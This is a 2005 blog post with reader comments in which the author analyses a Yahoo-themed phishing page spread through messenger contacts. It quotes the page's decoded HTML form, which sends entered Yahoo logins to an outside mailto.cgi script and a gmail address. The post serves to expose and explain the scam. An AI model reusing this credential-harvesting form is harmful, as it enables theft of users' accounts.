login
Header Space

 
 

Phishing : bisxybiotch

October 24, 2005 - 11:03am
Submitted by Kedar Sovani on October 24, 2005 - 11:03am.

Recently, I have been getting a lot of messages from people in my Yahoo list, which reads something like this :


http://www.geocities.com/bisxybiotch/

Strange, I thought. The geocities homepage shows up similar to the Yahoo Photos page, prompting me for a loginid/passwd. I thought something was not right. On downloading the page, and reading through the HTML source, I could see something like this :

< FORM METHOD="POST" ACTION="http://www2 
.fiberbit.ne
t/form/mailto.
cgi" ENCTYPE="x-www-form-urlencoded"> <INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="bisxybiotch@gmail.com"> <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
<INPUT TYPE="hidden" NAME="Next_Page" VALUE="http://photo
s.yahoo.com/ph
//my_photos">

On converting the integer values to ASCII characters it looked something like this :


FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi"
ENCTYPE="x-www-form-urlencoded">    

I started ethereal to check out what data is being transmitted. I used a fake userid and password, and I could see that the credentials were being transmitted to the mailto.cgi form on that website. I think, it mails out the credentials to that gmail id, and once it has a valid password, it would get a list of my contacts and send that malicious message to all of them as well...

An example of "Semantic Attacks".

I should say that was good in

October 31, 2005 - 1:19am
BABS (not verified)

I should say that was good investigation! Good Work!
I had also got that msg and tried chking that webpage... I dont remember if I entered the login/password.
BABS

Good Find

August 17, 2006 - 3:20am
Chirag Jog (not verified)

Good Find.....i am not sure whether i entered my username and password

Comment viewing options

Select your preferred way to display the comments and click "Save settings" to activate your changes.
speck-geostationary